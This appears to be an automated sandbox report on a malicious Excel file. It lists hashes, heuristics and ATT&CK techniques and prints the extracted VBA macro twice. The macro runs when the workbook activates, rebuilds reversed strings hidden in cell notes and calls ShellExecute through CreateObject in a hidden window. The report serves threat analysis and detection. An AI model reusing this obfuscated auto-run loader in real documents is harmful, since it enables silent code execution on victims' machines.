Office (OLE) malware analysis — malicious · 3c756a5fe7968fef

MALICIOUS

Office (OLE)

85.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-07-10

MD5: 2ea2e6592564f71211f41a904062c79d SHA-1: 11c27f823def027129300d7515b3cbc6a64516d4 SHA-256: 3c756a5fe7968fef163f917c6b9aff383dc5ace3155db7d69324ba931446e1d5

100 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros. The macros construct a string that is then used with CreateObject to call ShellExecute, likely to download and execute a second-stage payload. The specific URL or command executed is obfuscated, but the intent is to run an external process. The technique of using VBA to execute arbitrary commands is common for initial access via spearphishing attachments.

Heuristics 3

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set giwHaVz = CreateObject(t7)
giwHaVz.ShellExecute "P" + n1, A2, "", "", 0
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1532 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1532 bytes
SHA-256: `37f1a43fb8aca0b238378d44f55449c94026b4e6d27e3f75d89ccef7802be127`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() Dim qoSx, ykJLZ, Jcplbdm, KxOG Set KxOG = Worksheets("Sheet1") qoSx = KxOG.Range("D500").NoteText + KxOG.Range("D501").NoteText + KxOG.Range("D502").NoteText + KxOG.Range("D503").NoteText + KxOG.Range("D504").NoteText + KxOG.Range("D505").NoteText + KxOG.Range("D506").NoteText + KxOG.Range("D507").NoteText t8hg0 = KxOG.Range("D508").NoteText y70fdsd = KxOG.Range("D509").NoteText Jcplbd = LOL.HjDih(Umimhmj(qoSx), t8hg0, y70fdsd) End Sub Function Umimhmj(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Umimhmj = StrNew End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "LOL" Function HjDih(A2, n1, t7) Dim giwHaVz Set giwHaVz = CreateObject(t7) giwHaVz.ShellExecute "P" + n1, A2, "", "", 0 End Function

SHA-256: 37f1a43fb8aca0b238378d44f55449c94026b4e6d27e3f75d89ccef7802be127

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Dim qoSx, ykJLZ, Jcplbdm, KxOG

Set KxOG = Worksheets("Sheet1")

  qoSx = KxOG.Range("D500").NoteText + KxOG.Range("D501").NoteText + KxOG.Range("D502").NoteText + KxOG.Range("D503").NoteText + KxOG.Range("D504").NoteText + KxOG.Range("D505").NoteText + KxOG.Range("D506").NoteText + KxOG.Range("D507").NoteText
 
 t8hg0 = KxOG.Range("D508").NoteText
 y70fdsd = KxOG.Range("D509").NoteText

  Jcplbd = LOL.HjDih(Umimhmj(qoSx), t8hg0, y70fdsd)


End Sub
  


Function Umimhmj(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Umimhmj = StrNew
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "LOL"

Function HjDih(A2, n1, t7)
Dim giwHaVz

Set giwHaVz = CreateObject(t7)
giwHaVz.ShellExecute "P" + n1, A2, "", "", 0



End Function

Open this report in the interactive analyzer, or submit your own file for analysis.